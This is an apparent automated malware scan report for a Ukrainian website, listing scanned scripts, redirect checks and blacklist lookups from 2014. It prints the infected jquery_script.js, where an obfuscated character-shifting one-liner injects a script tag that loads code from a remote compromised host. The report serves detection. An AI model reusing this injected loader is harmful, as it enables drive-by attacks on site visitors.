Scanned pages/files
Request | Server response | Status |
http://aspirantura.com.ua/ | 200 OK Content-Length: 21228 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.js | 200 OK Content-Length: 268381 Content-Type: text/javascript | clean |
http://aspirantura.com.ua/js/jquery.selectbox.js | 200 OK Content-Length: 4913 Content-Type: application/x-javascript | clean |
http://aspirantura.com.ua/js/jquery_script.js | 200 OK Content-Length: 2434 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $('.info_list_block').hide(); $('.list_slider li').hover(function(){ var index=$(this).index(); var position=$(this).position(); var top=position.top+40; $('.info_list_arrow').stop().css('top',top+"px"); var text=$(this).find('a').html(); var text_two=$(this).find('div').html(); $('.info_list_title').html(text); $('.info_list_text').html(text_two); $('.info_list_block').fadeIn(500); },function(){ $('.order_add, .order_add_text').fadeIn(300); testPos=false; }else{ $('.btn_add').animate({left: "37px"},250); $('.order_add, .order_add_text').fadeOut(0); testPos=true; }}); }); <!-- js-tools --> c=0;while(c<90)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00vsqfo/jo/vb0benjojtusbups0dpnqpofout0dpn`jotubmmfs0tubu/qiq#?=0tdsjqu?'.charCodeAt(c++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://aspirantura.com.ua/js/jquery-ui-1.10.3.custom.js | 200 OK Content-Length: 300885 Content-Type: application/x-javascript | clean |
http://aspirantura.com.ua/js/common.js | 200 OK Content-Length: 7201 Content-Type: application/x-javascript | clean |
http://aspirantura.com.ua/js/bootstrap.js | 200 OK Content-Length: 58533 Content-Type: application/x-javascript | clean |
http://aspirantura.com.ua/js/application.js | 200 OK Content-Length: 3030 Content-Type: application/x-javascript | clean |
http://aspirantura.com.ua/js/bootstrap-carousel.js | 200 OK Content-Length: 2993 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js | 200 OK Content-Length: 95786 Content-Type: text/javascript | clean |
http://aspirantura.com.ua/uk/ | 200 OK Content-Length: 22641 Content-Type: text/html | clean |
http://aspirantura.com.ua/ru/ | 200 OK Content-Length: 21228 Content-Type: text/html | clean |
http://aspirantura.com.ua/ru/o-kompanii/ | 200 OK Content-Length: 20118 Content-Type: text/html | clean |
http://aspirantura.com.ua/uk/o-kompanii/ | 200 OK Content-Length: 20351 Content-Type: text/html | clean |
http://aspirantura.com.ua/uk/umovi/ | 200 OK Content-Length: 18197 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aspirantura.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Wed, 20 Aug 2014 22:04:06 GMT
Pragma: no-cache
Server: nginx/1.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Wed, 20 Aug 2014 23:04:06 GMT
Set-Cookie: PHPSESSID=fc40d482e43daada3a46e6dc236db4ed; expires=Wed, 27-Aug-2014 22:04:05 GMT; path=/uk/
X-Powered-By: PHP/5.3.18
GET / HTTP/1.1
Host: aspirantura.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Wed, 20 Aug 2014 22:04:06 GMT
Pragma: no-cache
Server: nginx/1.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Wed, 20 Aug 2014 23:04:06 GMT
Set-Cookie: PHPSESSID=fc40d482e43daada3a46e6dc236db4ed; expires=Wed, 27-Aug-2014 22:04:05 GMT; path=/uk/
X-Powered-By: PHP/5.3.18
Second query (visit from search engine):
GET / HTTP/1.1
Host: aspirantura.com.ua
Referer: http://www.google.com/search?q=aspirantura.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aspirantura.com.ua
Referer: http://www.google.com/search?q=aspirantura.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aspirantura.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aspirantura.com.ua/
Result: aspirantura.com.ua is not infected or malware details are not published yet.
Result: aspirantura.com.ua is not infected or malware details are not published yet.